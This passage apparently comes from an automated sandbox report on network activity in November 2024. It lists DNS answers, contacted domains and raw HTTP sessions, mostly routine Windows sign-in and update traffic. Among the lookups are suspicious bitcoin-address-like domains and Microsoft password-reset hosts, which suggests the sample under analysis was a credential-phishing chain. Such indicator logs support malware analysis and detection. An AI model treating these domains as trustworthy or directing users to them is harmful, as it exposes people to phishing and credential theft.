                                                                                                                              Nov 18, 2024 17:56:03.707871914 CET1.1.1.1192.168.2.170xfb7fNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:03.707871914 CET1.1.1.1192.168.2.170xfb7fNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:03.707911968 CET1.1.1.1192.168.2.170x9e08No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:05.068664074 CET1.1.1.1192.168.2.170xf7dNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:05.068664074 CET1.1.1.1192.168.2.170xf7dNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:05.068689108 CET1.1.1.1192.168.2.170xd6a4No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:06.980901003 CET1.1.1.1192.168.2.170x1b1eNo error (0)bc1qlpk73pgj3dz02nq8d9kpdxk.org154.216.17.193A (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:07.652966022 CET1.1.1.1192.168.2.170x6a61No error (0)bc1qlpk73pgj3dz02nq8d9kpdxk.org154.216.17.193A (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:11.128128052 CET1.1.1.1192.168.2.170xb0eaNo error (0)bc1qlpk73pgj3dz02nq8d9kpdxk.org154.216.17.193A (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:13.561923027 CET1.1.1.1192.168.2.170x95ceNo error (0)bc1qcr8muz00d2v7uqg5ggulrmm.com65IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:13.563096046 CET1.1.1.1192.168.2.170x9de3No error (0)bc1qcr8muz00d2v7uqg5ggulrmm.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:13.563096046 CET1.1.1.1192.168.2.170x9de3No error (0)bc1qcr8muz00d2v7uqg5ggulrmm.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:15.618797064 CET1.1.1.1192.168.2.170xef1dNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:20.059432983 CET1.1.1.1192.168.2.170xf6e1No error (0)bc1qcr8muz00d2v7uqg5ggulrmm.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:20.059432983 CET1.1.1.1192.168.2.170xf6e1No error (0)bc1qcr8muz00d2v7uqg5ggulrmm.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:20.082411051 CET1.1.1.1192.168.2.170x3989No error (0)bc1qcr8muz00d2v7uqg5ggulrmm.com65IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:21.059240103 CET1.1.1.1192.168.2.170x54caNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:21.059240103 CET1.1.1.1192.168.2.170x54caNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:21.059240103 CET1.1.1.1192.168.2.170x54caNo error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:21.059308052 CET1.1.1.1192.168.2.170x5028No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:21.059308052 CET1.1.1.1192.168.2.170x5028No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:21.060085058 CET1.1.1.1192.168.2.170x256bNo error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.nets-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:21.060085058 CET1.1.1.1192.168.2.170x256bNo error (0)s-part-0032.t-0009.t-msedge.net13.107.246.60A (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:21.951401949 CET1.1.1.1192.168.2.170x139aNo error (0)shed.dual-low.s-part-0016.t-0009.t-msedge.nets-part-0016.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:21.951401949 CET1.1.1.1192.168.2.170x139aNo error (0)s-part-0016.t-0009.t-msedge.net13.107.246.44A (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:22.343108892 CET1.1.1.1192.168.2.170xee78No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:22.343108892 CET1.1.1.1192.168.2.170xee78No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:22.343108892 CET1.1.1.1192.168.2.170xee78No error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:22.343139887 CET1.1.1.1192.168.2.170x3838No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:22.343139887 CET1.1.1.1192.168.2.170x3838No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:28.039889097 CET1.1.1.1192.168.2.170x3202No error (0)templatesmetadata.office.nettemplatesmetadata.office.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:40.064033985 CET1.1.1.1192.168.2.170x3d68No error (0)bc1qv5p8dwc98n3judrczkmpkjz.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:40.064033985 CET1.1.1.1192.168.2.170x3d68No error (0)bc1qv5p8dwc98n3judrczkmpkjz.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:40.064138889 CET1.1.1.1192.168.2.170x73dbNo error (0)bc1qv5p8dwc98n3judrczkmpkjz.com65IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:46.939174891 CET1.1.1.1192.168.2.170xe1adNo error (0)bc1qv5p8dwc98n3judrczkmpkjz.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:46.939174891 CET1.1.1.1192.168.2.170xe1adNo error (0)bc1qv5p8dwc98n3judrczkmpkjz.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:46.960478067 CET1.1.1.1192.168.2.170xb145No error (0)bc1qv5p8dwc98n3judrczkmpkjz.com65IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:57:15.632363081 CET1.1.1.1192.168.2.170xf698No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:57:25.093153954 CET1.1.1.1192.168.2.170xc249No error (0)passwordreset.microsoftonline.compasswordreset.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:57:25.093563080 CET1.1.1.1192.168.2.170x9b06No error (0)passwordreset.microsoftonline.compasswordreset.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:57:25.252190113 CET1.1.1.1192.168.2.170x91b2No error (0)passwordreset.microsoftonline.compasswordreset.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:57:26.763554096 CET1.1.1.1192.168.2.170x7af2No error (0)ajax.aspnetcdn.commscomajax.vo.msecnd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:57:26.763598919 CET1.1.1.1192.168.2.170x46eeNo error (0)ajax.aspnetcdn.commscomajax.vo.msecnd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:57:27.028177023 CET1.1.1.1192.168.2.170xca44No error (0)passwordreset.microsoftonline.compasswordreset.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:57:27.168478012 CET1.1.1.1192.168.2.170xc3dcNo error (0)passwordreset.microsoftonline.compasswordreset.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:57:28.628328085 CET1.1.1.1192.168.2.170x9b93No error (0)ajax.aspnetcdn.commscomajax.vo.msecnd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:57:28.629628897 CET1.1.1.1192.168.2.170x1edNo error (0)ajax.aspnetcdn.commscomajax.vo.msecnd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              • login.live.com
                                                                                                                              • slscr.update.microsoft.com
                                                                                                                              • r.neurotags.net
                                                                                                                              • sepedatua.com
                                                                                                                              • https:
                                                                                                                                • timesofvartha.com
                                                                                                                                • challenges.cloudflare.com
                                                                                                                                • cdnjs.cloudflare.com
                                                                                                                                • bc1qlpk73pgj3dz02nq8d9kpdxk.org
                                                                                                                                • bc1qcr8muz00d2v7uqg5ggulrmm.com
                                                                                                                                • aadcdn.msauth.net
                                                                                                                                • aadcdn.msftauth.net
                                                                                                                                • bc1qv5p8dwc98n3judrczkmpkjz.com
                                                                                                                                • www.bing.com
                                                                                                                                • fp.msedge.net
                                                                                                                                • wac-ring-fallback.msedge.net
                                                                                                                              • a.nel.cloudflare.com
                                                                                                                              • evoke-windowsservices-tas.msedge.net
                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              0192.168.2.174970040.126.32.68443
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:55:27 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Content-Type: application/soap+xml
                                                                                                                              Accept: */*
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                              Content-Length: 3592
                                                                                                                              Host: login.live.com
                                                                                                                              2024-11-18 16:55:27 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                              Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                              2024-11-18 16:55:27 UTC569INHTTP/1.1 200 OK
                                                                                                                              Cache-Control: no-store, no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              Content-Type: application/soap+xml; charset=utf-8
                                                                                                                              Expires: Mon, 18 Nov 2024 16:54:27 GMT
                                                                                                                              P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                              x-ms-route-info: C529_BL2
                                                                                                                              x-ms-request-id: 4ee4682a-6c5a-45a2-a2ff-c010e634de92
                                                                                                                              PPServer: PPV: 30 H: BL02EPF0001D89C V: 0
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                              Date: Mon, 18 Nov 2024 16:55:27 GMT
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 11392
                                                                                                                              2024-11-18 16:55:27 UTC11392INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              1192.168.2.174970240.126.32.68443
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:55:29 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Content-Type: application/soap+xml
                                                                                                                              Accept: */*
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                              Content-Length: 4775
                                                                                                                              Host: login.live.com
                                                                                                                              2024-11-18 16:55:29 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                              Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                              2024-11-18 16:55:29 UTC569INHTTP/1.1 200 OK
                                                                                                                              Cache-Control: no-store, no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              Content-Type: application/soap+xml; charset=utf-8
                                                                                                                              Expires: Mon, 18 Nov 2024 16:54:29 GMT
                                                                                                                              P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                              x-ms-route-info: C529_BL2
                                                                                                                              x-ms-request-id: a3ad2dfa-2cbd-4c86-aee9-31b4976f4165
                                                                                                                              PPServer: PPV: 30 H: BL02EPF000270D0 V: 0
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                              Date: Mon, 18 Nov 2024 16:55:29 GMT
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 11392
                                                                                                                              2024-11-18 16:55:29 UTC11392INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              2192.168.2.1749703172.202.163.200443
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:55:30 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ePsK7ZCVA7dfvLb&MD=7twsYf23 HTTP/1.1
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Accept: */*
                                                                                                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                              Host: slscr.update.microsoft.com
                                                                                                                              2024-11-18 16:55:30 UTC560INHTTP/1.1 200 OK
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Expires: -1
                                                                                                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                              ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                              MS-CorrelationId: 267f9dd6-bc2b-4c1e-a521-3be245c58fef
                                                                                                                              MS-RequestId: ccadf40f-d75e-4079-8055-2162b060da45
                                                                                                                              MS-CV: QSnSwXAcv0CokKZ2.0
                                                                                                                              X-Microsoft-SLSClientCache: 2880
                                                                                                                              Content-Disposition: attachment; filename=environment.cab
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Date: Mon, 18 Nov 2024 16:55:30 GMT
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 24490
                                                                                                                              2024-11-18 16:55:30 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                              Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                              2024-11-18 16:55:30 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                              Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              3192.168.2.174970440.126.32.68443
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:55:30 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Content-Type: application/soap+xml
                                                                                                                              Accept: */*
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                              Content-Length: 4775
                                                                                                                              Host: login.live.com
                                                                                                                              2024-11-18 16:55:30 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                              Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                              2024-11-18 16:55:31 UTC569INHTTP/1.1 200 OK
                                                                                                                              Cache-Control: no-store, no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              Content-Type: application/soap+xml; charset=utf-8
                                                                                                                              Expires: Mon, 18 Nov 2024 16:54:30 GMT
                                                                                                                              P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                              x-ms-route-info: C529_BL2
                                                                                                                              x-ms-request-id: eae8200c-eed5-46b6-be65-886797279d1b
                                                                                                                              PPServer: PPV: 30 H: BL02EPF0001D73A V: 0
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                              Date: Mon, 18 Nov 2024 16:55:30 GMT
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 11392
                                                                                                                              2024-11-18 16:55:31 UTC11392INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              4192.168.2.174970640.126.32.68443
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:55:32 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Content-Type: application/soap+xml
